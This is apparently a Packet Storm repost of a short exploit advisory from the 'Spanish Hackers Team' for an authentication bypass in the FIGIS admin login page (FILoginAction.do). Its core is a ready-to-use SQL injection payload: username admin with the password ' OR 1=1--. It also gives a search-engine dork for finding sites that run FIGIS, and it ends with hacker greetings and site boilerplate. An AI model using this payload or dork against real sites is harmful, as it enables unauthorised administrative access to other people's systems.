FIGIS suffers from a bypass vulnerability due to a SQL injection vulnerability.
e00f3f9a2f8b067340a5a276a896df5bc431239402262fdf194e52282330e383# FIGIS (FILogin.do) Bypass SQL Injection Vulnerability
# Download:
# Not Available
# Bug found by Jose Luis Góngora Fernández / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "accionado por FIGIS" / "powered by FIGIS"
# Stop lammer
# Admin Login:
../PATH/FILoginAction.do
http://example.com/fi/FILoginAction.do
# Simple - SQL Injection in Admin Login (Exploit)
User: admin
Password: ' OR 1=1--
//---------------------------------------\\
Greetz To: All Hackers
Jose Luis Góngora Fernández / JosS!
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed